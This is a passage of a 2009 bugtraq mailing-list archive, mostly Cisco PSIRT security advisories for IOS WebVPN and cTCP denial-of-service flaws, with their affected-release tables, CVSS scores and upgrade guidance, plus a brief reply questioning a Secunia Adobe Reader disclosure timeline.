|------------+--------------------------------------+---------------|
| 12.3JL     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3JX     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(22)T1    |
|            |                                      |               |
| 12.3T      | Vulnerable; first fixed in 12.4T     | 12.4(15)T9;   |
|            |                                      | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
| 12.3TPC    | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3VA     | Vulnerable; contact TAC              |               |
|------------+--------------------------------------+---------------|
| 12.3XA     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XB     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XC     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XD     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XE     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XF     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XG     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XI     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XJ     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XK     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XL     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XQ     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XR     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XS     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XU     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XW     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XX     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XY     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3XZ     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3YA     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3YD     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3YF     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3YG     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3YH     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3YI     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3YJ     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
|            | Releases prior to 12.3(11)YK3 are    | 12.4(22)T1    |
|            | vulnerable, release 12.3(11)YK3 and  |               |
| 12.3YK     | later are not vulnerable; first      | 12.4(15)T9;   |
|            | fixed in 12.4T                       | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
| 12.3YM     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(22)T1    |
|            |                                      |               |
| 12.3YQ     | Vulnerable; first fixed in 12.4T     | 12.4(15)T9;   |
|            |                                      | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(22)T1    |
|            |                                      |               |
| 12.3YS     | Vulnerable; first fixed in 12.4T     | 12.4(15)T9;   |
|            |                                      | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(22)T1    |
|            |                                      |               |
| 12.3YT     | Vulnerable; first fixed in 12.4T     | 12.4(15)T9;   |
|            |                                      | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(22)T1    |
|            |                                      |               |
| 12.3YU     | Vulnerable; first fixed in 12.4T     | 12.4(15)T9;   |
|            |                                      | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
| 12.3YX     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3YZ     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.3ZA     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| Affected   |                                      | Recommended   |
| 12.4-Based | First Fixed Release                  | Release       |
| Releases   |                                      |               |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(18e)     |
|            | 12.4(18e)                            |               |
| 12.4       |                                      | 12.4(23a);    |
|            | 12.4(23a); Available on 30-APR-2009  | Available on  |
|            |                                      | 30-APR-2009   |
|------------+--------------------------------------+---------------|
| 12.4JA     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4JDA    | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4JK     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4JL     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4JMA    | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4JMB    | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4JX     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4MD     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4MR     | 12.4(16)MR                           | 12.4(19)MR2   |
|------------+--------------------------------------+---------------|
| 12.4SW     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
|            | 12.4(15)T7                           | 12.4(22)T1    |
|            |                                      |               |
| 12.4T      | 12.4(20)T                            | 12.4(15)T9;   |
|            |                                      | Available on  |
|            | 12.4(15)T9; Available on 29-APR-2009 | 29-APR-2009   |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(22)T1    |
|            |                                      |               |
| 12.4XA     | Vulnerable; first fixed in 12.4T     | 12.4(15)T9;   |
|            |                                      | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(22)T1    |
|            |                                      |               |
| 12.4XB     | Vulnerable; first fixed in 12.4T     | 12.4(15)T9;   |
|            |                                      | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(22)T1    |
|            |                                      |               |
| 12.4XC     | Vulnerable; first fixed in 12.4T     | 12.4(15)T9;   |
|            |                                      | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
|            | 12.4(4)XD12; Available on            | 12.4(4)XD12;  |
| 12.4XD     | 27-MAR-2009                          | Available on  |
|            |                                      | 27-MAR-2009   |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(22)T1    |
|            |                                      |               |
| 12.4XE     | Vulnerable; first fixed in 12.4T     | 12.4(15)T9;   |
|            |                                      | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
| 12.4XF     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4XG     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(22)T1    |
|            |                                      |               |
| 12.4XJ     | Vulnerable; first fixed in 12.4T     | 12.4(15)T9;   |
|            |                                      | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
| 12.4XK     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4XL     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4XM     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4XN     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4XP     | Vulnerable; contact TAC              |               |
|------------+--------------------------------------+---------------|
| 12.4XQ     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4XR     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
|            |                                      | 12.4(22)T1    |
|            |                                      |               |
| 12.4XT     | Vulnerable; first fixed in 12.4T     | 12.4(15)T9;   |
|            |                                      | Available on  |
|            |                                      | 29-APR-2009   |
|------------+--------------------------------------+---------------|
| 12.4XV     | Vulnerable; contact TAC              |               |
|------------+--------------------------------------+---------------|
| 12.4XW     | 12.4(11)XW10                         | 12.4(11)XW10  |
|------------+--------------------------------------+---------------|
| 12.4XY     | 12.4(15)XY4                          | 12.4(22)T1    |
|------------+--------------------------------------+---------------|
| 12.4XZ     | 12.4(15)XZ1                          | 12.4(15)XZ2   |
|------------+--------------------------------------+---------------|
| 12.4YA     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4YB     | Not Vulnerable                       |               |
|------------+--------------------------------------+---------------|
| 12.4YD     | Not Vulnerable                       |               |
+-------------------------------------------------------------------+

Workarounds
==========
There are no workarounds for the vulnerabilities described in this
advisory.

Obtaining Fixed Software
=======================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at 
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at 
http://www.cisco.com/public/sw-center/sw-usingswc.shtml

Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.

  * +1 800 553 2447 (toll free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * e-mail: tac@cisco.com

Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.

Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.

Exploitation and Public Announcements
====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.

These vulnerabilities were discovered when handling customer support
calls.

Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.

Distribution
===========
This advisory is posted on Cisco's worldwide website at:

http://www.cisco.com/warp/public/707/cisco-sa-20090325-webvpn.shtml

In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.

  * cust-security-announce@cisco.com
  * first-teams@first.org
  * bugtraq@securityfocus.com
  * vulnwatch@vulnwatch.org
  * cisco@spot.colorado.edu
  * cisco-nsp@puck.nether.net
  * full-disclosure@lists.grok.org.uk
  * comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.

Revision History
===============
+--------------------------------------------------------+
| Revision 1.0 | 2009-March-25 | Initial public release. |
+--------------------------------------------------------+

Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at 
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco 
security notices. All Cisco security advisories are available at 
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)

iEYEARECAAYFAknKUdcACgkQ86n/Gc8U/uALXwCgmcIGTSzRIHpHRbVVmMNqPFT4
+CIAn27HdwwpkhVDgEIWTMsIX6NE4BgR
=+f8D
-----END PGP SIGNATURE-----

From: Florian Weimer <fw@deneb.enyo.de>
To: Secunia Research <remove-vuln@secunia.com>
Cc: bugtraq@securityfocus.com
Subject: Re: Secunia Research: Adobe Reader JBIG2 Symbol Dictionary Buffer Overflow
Date: Wed, 25 Mar 2009 17:42:11 +0100

* Secunia Research:

> =====================================================================
> 5) Solution

> Update to version 7.1.1, 8.1.4, or 9.1.

> =====================================================================
> 6) Time Table

> 06/03/2009 - Vendor notified.
> 07/03/2009 - Vendor response.
> 25/03/2009 - Public disclosure.

Something doesn't add up because the 9.1 binary I've got was created
on February 28th, according to Verisign's time stamping signature in
the Authenticode signature.

From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: Cisco IOS cTCP Denial of Service Vulnerability
Date: Wed, 25 Mar 2009 17:00:00 +0100

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Cisco IOS cTCP Denial of Service
Vulnerability

Advisory ID: cisco-sa-20090325-ctcp

http://www.cisco.com/warp/public/707/cisco-sa-20090325-ctcp.shtml

Revision 1.0

For Public Release 2009 March 25 1600 UTC (GMT)

- ---------------------------------------------------------------------

Summary
======
A series of TCP packets may cause a denial of service (DoS) condition
on Cisco IOS devices that are configured as Easy VPN servers with the
Cisco Tunneling Control Protocol (cTCP) encapsulation feature. Cisco
has released free software updates that address this vulnerability.
No workarounds are available; however, the IPSec NAT traversal
(NAT-T) feature can be used as an alternative.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20090325-ctcp.shtml

Note: The March 25, 2009, Cisco IOS Security Advisory bundled
publication includes eight Security Advisories. All of the advisories
address vulnerabilities in Cisco IOS Software. Each advisory lists
the releases that correct the vulnerability or vulnerabilities in the
advisory. The following table lists releases that correct all Cisco
IOS Software vulnerabilities that have been published in Cisco
Security Advisories on March 25, 2009, or earlier.

http://www.cisco.com/warp/public/707/cisco-sa-20090325-bundle.shtml

Individual publication links are listed below:

  * Cisco IOS cTCP Denial of Service Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-ctcp.shtml

  * Cisco IOS Software Multiple Features IP Sockets Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-ip.shtml

  * Cisco IOS Software Mobile IP and Mobile IPv6 Vulnerabilities
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-mobileip.shtml

  * Cisco IOS Software Secure Copy Privilege Escalation Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-scp.shtml

  * Cisco IOS Software Session Initiation Protocol Denial of Service
    Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-sip.shtml

  * Cisco IOS Software Multiple Features Crafted TCP Sequence
    Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-tcp.shtml

  * Cisco IOS Software Multiple Features Crafted UDP Packet
    Vulnerability
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-udp.shtml

  * Cisco IOS Software WebVPN and SSLVPN Vulnerabilities
    http://www.cisco.com/warp/public/707/cisco-sa-20090325-webvpn.shtml

Affected Products
================
Vulnerable Products
+------------------

Cisco IOS devices running versions 12.4(9)T or later and configured
for Cisco Tunneling Control Protocol (cTCP) encapsulation for EZVPN
server are vulnerable.

Note: The cTCP encapsulation feature was introduced in Cisco IOS
version 12.4(9)T. The cTCP encapsulation feature is disabled by
default. Cisco IOS devices configured for EZVPN client are not
affected by this vulnerability. Only devices configured as EZVPN
servers are vulnerable.

To configure the cTCP encapsulation feature for Easy VPN, use the
crypto ctcp command in global configuration mode. You can optionally
specify the port number that the device will listen to with the
crypto ctcp port <port> command. Up to ten numbers can be configured
and the port value can be from 1 through 65535. If the port keyword
is not configured, the default port number is 10000. In the following
example, the Cisco IOS device is configured to listen for cTCP
messages on port 10000.

    crypto ctcp port 10000

Note: The port keyword is configured only on the Cisco IOS device
acting as an EZVPN server.

To determine the version of the Cisco IOS software running on a Cisco
product, log in to the device and issue the show version command to
display the system banner. Cisco IOS software will identify itself as
"Internetwork Operating System Software" or simply "IOS". On the next
line of output, the image name will be displayed between parentheses,
followed by "Version" and the IOS release name. Other Cisco devices
will not have the show version command or will give different output.

The following example identifies a Cisco product running Cisco IOS
Software release 12.3(26) with an installed image name of C2500-IS-L:

        Router#show version
        Cisco Internetwork Operating System Software
        IOS (tm) 2500 Software (C2500-IS-L), Version 12.3(26), RELEASE SOFTWARE (fc2)
        Technical Support: http://www.cisco.com/techsupport
        Copyright (c) 1986-2008 by cisco Systems, Inc.
        Compiled Mon 17-Mar-08 14:39 by dchih

      <output truncated>


The next example shows a product running Cisco IOS Software release
12.4(20)T with an image name of C1841-ADVENTERPRISEK9-M:

        Router#show version
        Cisco IOS Software, 1841 Software (C1841-ADVENTERPRISEK9-M), Version 12.4(20)T, RELEASE SOFTWARE (fc3)
        Technical Support: http://www.cisco.com/techsupport
        Copyright (c) 1986-2008 by Cisco Systems, Inc.
        Compiled Thu 10-Jul-08 20:25 by prod_rel_team

      <output truncated>

Additional information on the Cisco IOS release naming conventions
can be found in the document entitled "White Paper: Cisco IOS
Reference Guide", which is available at 
http://www.cisco.com/warp/public/620/1.html

Products Confirmed Not Vulnerable
+--------------------------------

Cisco IOS devices that are not configured for cTCP are not affected
by this vulnerability. The Cisco ASA and Cisco VPN 3000 series
concentrators are not vulnerable. Cisco IOS devices configured as
EZVPN clients are not affected by this vulnerability. The Cisco VPN
Client is not vulnerable. Cisco IOS-XR and Cisco IOS-XE software are
not affected by this vulnerability. No other Cisco products are
currently known to be affected by this vulnerability.

Details
======
The Cisco Tunneling Control Protocol (cTCP) feature is used by Easy
VPN remote devices operating in an environment in which standard IPSec
does not function transparently without modification to existing
firewall rules. The cTCP traffic is actually TCP traffic. Cisco IOS
cTCP packets are Internet Key Exchange (IKE) or Encapsulating
Security Payload (ESP) packets that are being transmitted over TCP.

A vulnerability exists where a series of TCP packets may cause a
Cisco IOS device that is configured as an Easy VPN server with the
cTCP encapsulation feature to run out of memory. This vulnerability
is documented in Cisco Bug IDs CSCsr16693 and CSCsu21828; and has 
been assigned the Common Vulnerabilities and Exposures (CVE) 
identifier CVE-2009-0635.

Vulnerability Scoring Details
============================
Cisco has provided scores for the vulnerability in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding
CVSS at

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at

http://intellishield.cisco.com/security/alertmanager/cvss.

CSCsr16693 - cTCP server may crash when processing a series of TCP
             packets

CVSS Base Score - 7.8

 Access Vector           - Network
 Access Complexity       - Low
 Authentication          - None
 Confidentiality Impact  - None
 Integrity Impact        - None
 Availability Impact     - Complete

CVSS Temporal Score - 6.4

 Exploitability          - Functional
 Remediation Level       - Official-Fix
 Report Confidence       - Confirmed

CSCsu21828 - Cisco IOS Device may crash with cTCP enabled

CVSS Base Score - 7.8

 Access Vector           - Network
 Access Complexity       - Low
 Authentication          - None
 Confidentiality Impact  - None
 Integrity Impact        - None
 Availability Impact     - Complete

CVSS Temporal Score - 6.4

 Exploitability          - Functional
 Remediation Level       - Official-Fix
 Report Confidence       - Confirmed

Impact
=====
Successful exploitation of this vulnerability may cause the affected
device to run out of memory. Repeated exploitation will result in a
denial of service (DoS) condition.

Software Versions and Fixes
==========================
When considering software upgrades, also consult 
http://www.cisco.com/go/psirt and any subsequent advisories to 
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

Each row of the Cisco IOS software table (below) names a Cisco IOS
release train. If a given release train is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. The "Recommended
Release" column indicates the releases which have fixes for all the
published vulnerabilities at the time of this Advisory. A device
running a release in the given train that is earlier than the release
in a specific column (less than the First Fixed Release) is known to
be vulnerable. Cisco recommends upgrading to a release equal to or
later than the release in the "Recommended Releases" column of the
table.

+-------------------------------------------------------------------+
|   Major Release   |       Availability of Repaired Releases       |
|-------------------+-----------------------------------------------|
| Affected          |                       |                       |
| 12.0-Based        | First Fixed Release   | Recommended Release   |
| Releases          |                       |                       |
|-------------------------------------------------------------------|
| There are no affected 12.0 based releases                         |
|-------------------------------------------------------------------|
| Affected          |                       |                       |
| 12.1-Based        | First Fixed Release   | Recommended Release   |
| Releases          |                       |                       |
|-------------------------------------------------------------------|
| There are no affected 12.1 based releases                         |
|-------------------------------------------------------------------|
| Affected          |                       |                       |
| 12.2-Based        | First Fixed Release   | Recommended Release   |
| Releases          |                       |                       |
|-------------------------------------------------------------------|
| There are no affected 12.2 based releases                         |
|-------------------------------------------------------------------|
| Affected          |                       |                       |
| 12.3-Based        | First Fixed Release   | Recommended Release   |
| Releases          |                       |                       |
|-------------------------------------------------------------------|
| There are no affected 12.3 based releases                         |
|-------------------------------------------------------------------|
| Affected          |                       |                       |
| 12.4-Based        | First Fixed Release   | Recommended Release   |
| Releases          |                       |                       |
|-------------------+-----------------------+-----------------------|
| 12.4              | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4JA            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4JDA           | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4JK            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4JL            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4JMA           | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4JMB           | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4JX            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4MD            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4MR            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4SW            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
|                   | 12.4(20)T2            | 12.4(22)T1            |
| 12.4T             |                       |                       |
|                   | 12.4(15)T9; Available | 12.4(15)T9; Available |
|                   | on 29-APR-2009        | on 29-APR-2009        |
|-------------------+-----------------------+-----------------------|
| 12.4XA            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4XB            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4XC            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4XD            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4XE            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4XF            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4XG            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4XJ            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4XK            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4XL            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4XM            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4XN            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4XP            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4XQ            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4XR            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4XT            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4XV            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4XW            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4XY            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4XZ            | 12.4(15)XZ2           | 12.4(15)XZ2           |
|-------------------+-----------------------+-----------------------|
| 12.4YA            | 12.4(20)YA2           | 12.4(20)YA3           |
|-------------------+-----------------------+-----------------------|
| 12.4YB            | Not Vulnerable        |                       |
|-------------------+-----------------------+-----------------------|
| 12.4YD            | Not Vulnerable        |                       |
+-------------------------------------------------------------------+

Workarounds
==========
No workarounds are available.

As an alternative, the IPSec NAT traversal (NAT-T) feature can be
used. The IPSec NAT-T feature introduces support for IP Security
(IPSec) traffic to travel through Network Address Translation (NAT)
or Port Address Translation (PAT) points in the network by addressing
many known incompatibilities between NAT and IPSec.

Note: The NAT-T feature was introduced in Cisco IOS version
12.2(13)T.

NAT Traversal is a feature that is auto detected by VPN devices.
There are no configuration steps for a router running Cisco IOS
Release 12.2(13)T and later. If both VPN devices are NAT-T capable,
NAT Traversal is auto-detected and auto-negotiated.

Note: When you enable NAT-T, the Cisco IOS device automatically opens
UDP port 4500 on all IPSec enabled interfaces.

Caution: Be aware that you may need to enable IPSec over UDP on Cisco
VPN software clients to support NAT-T. Additionally, you may need to
change firewall rules to allow UDP port 500 for Internet Key Exchange
(IKE) and UDP port 4500 for NAT-T.

For more information about NAT-T, refer to the white paper at:

http://www.cisco.com/en/US/docs/ios/security/configuration/guide/sec_ipsec_nat_transp.html

Additional mitigations that can be deployed on Cisco devices within
the network are available in the Cisco Applied Mitigation Bulletin
companion document for this advisory, which is available at the
following link:

http://www.cisco.com/warp/public/707/cisco-amb-20090325-ctcp.shtml

Obtaining Fixed Software
=======================
Cisco has released free software updates that address this
vulnerability. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at 
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html
or as otherwise set forth at Cisco.com Downloads at 
http://www.cisco.com/public/sw-center/sw-usingswc.shtml

Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.

  * +1 800 553 2447 (toll free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * e-mail: tac@cisco.com

Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.

Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized 
telephone numbers, and instructions and e-mail addresses for use in
various languages.

Exploitation and Public Announcements
====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.

This vulnerability was found during the resolution of a technical
support service request.

Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.

Distribution
===========
This advisory is posted on Cisco's worldwide website at:

http://www.cisco.com/warp/public/707/cisco-sa-20090325-ctcp.shtml

In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.

  * cust-security-announce@cisco.com
  * first-bulletins@lists.first.org
  * bugtraq@securityfocus.com
